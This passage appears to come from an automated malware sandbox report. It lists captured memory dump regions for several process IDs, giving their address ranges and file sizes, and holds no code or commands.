                                                          • memory/2828-150-0x0000000005B40000-0x0000000005B5E000-memory.dmp
                                                            Filesize

                                                            120KB

                                                          • memory/2828-132-0x0000000006180000-0x0000000006724000-memory.dmp
                                                            Filesize

                                                            5.6MB

                                                          • memory/2828-131-0x0000000005AF0000-0x0000000005AF1000-memory.dmp
                                                            Filesize

                                                            4KB

                                                          • memory/2828-130-0x0000000000FE0000-0x0000000001140000-memory.dmp
                                                            Filesize

                                                            1.4MB

                                                          • memory/2828-151-0x0000000006020000-0x000000000602A000-memory.dmp
                                                            Filesize

                                                            40KB

                                                          • memory/2856-244-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/2856-246-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/2856-243-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/2928-251-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/2928-252-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/2928-253-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/3024-249-0x0000000140000000-0x000000014002A000-memory.dmp
                                                            Filesize

                                                            168KB

                                                          • memory/3060-289-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/3060-287-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/3060-288-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/3084-155-0x00000000049B0000-0x00000000049C2000-memory.dmp
                                                            Filesize

                                                            72KB

                                                          • memory/3084-162-0x00000000074D0000-0x0000000007520000-memory.dmp
                                                            Filesize

                                                            320KB

                                                          • memory/3084-157-0x0000000005540000-0x0000000005702000-memory.dmp
                                                            Filesize

                                                            1.8MB

                                                          • memory/3084-158-0x0000000004900000-0x0000000004F18000-memory.dmp
                                                            Filesize

                                                            6.1MB

                                                          • memory/3084-156-0x0000000004AE0000-0x0000000004BEA000-memory.dmp
                                                            Filesize

                                                            1.0MB

                                                          • memory/3084-154-0x0000000004F20000-0x0000000005538000-memory.dmp
                                                            Filesize

                                                            6.1MB

                                                          • memory/3084-153-0x0000000000500000-0x000000000056C000-memory.dmp
                                                            Filesize

                                                            432KB

                                                          • memory/3084-161-0x0000000006830000-0x000000000686C000-memory.dmp
                                                            Filesize

                                                            240KB

                                                          • memory/3084-159-0x00000000069D0000-0x0000000006EFC000-memory.dmp
                                                            Filesize

                                                            5.2MB

                                                          • memory/3084-160-0x0000000006580000-0x00000000065E6000-memory.dmp
                                                            Filesize

                                                            408KB

                                                          • memory/3100-245-0x0000000004F40000-0x0000000005558000-memory.dmp
                                                            Filesize

                                                            6.1MB

                                                          • memory/3100-240-0x0000000000740000-0x0000000000760000-memory.dmp
                                                            Filesize

                                                            128KB

                                                          • memory/3300-256-0x0000000140000000-0x000000014002A000-memory.dmp
                                                            Filesize

                                                            168KB

                                                          • memory/3908-186-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/3908-184-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/3908-185-0x00007FF641840000-0x00007FF642128000-memory.dmp
                                                            Filesize

                                                            8.9MB

                                                          • memory/3964-319-0x0000000140000000-0x000000014002A000-memory.dmp
                                                            Filesize

                                                            168KB